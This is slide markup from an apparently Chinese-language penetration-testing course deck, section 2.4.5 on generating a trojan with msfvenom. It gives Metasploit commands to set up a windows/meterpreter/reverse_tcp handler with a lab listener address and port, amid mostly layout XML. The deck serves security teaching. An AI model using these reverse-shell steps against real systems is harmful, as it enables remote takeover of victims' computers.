            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="文本框 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377815" y="932815"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.打开Kali Linux的“root”目录，可以查看生成的木马文件，如图2-4-55所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377815" y="1577975"/>
            <a:ext cx="5276850" cy="4152900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="文本框 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377815" y="5730875"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-55 查看生成的木马文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马的方法</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="文本框 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086350" y="623253"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.执行命令“msfconsole”进入msf，使用“use exploit/multi/handler”命令调用模块，并使用“set payload windows/meterpreter/reverse_tcp”、“set lport 5555”和“set lhost 192.168.172.128”配置好相应的参数，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2-4-56</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086350" y="2376488"/>
            <a:ext cx="5276850" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="文本框 145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086350" y="3633788"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-56 调用模块并配置参数4.使用“run”或者“exploit”命令运行模块进行扫描，如图2-4-57所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086350" y="5110163"/>
            <a:ext cx="5276850" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="文本框 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086350" y="6034088"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-57 运行模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马的方法</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
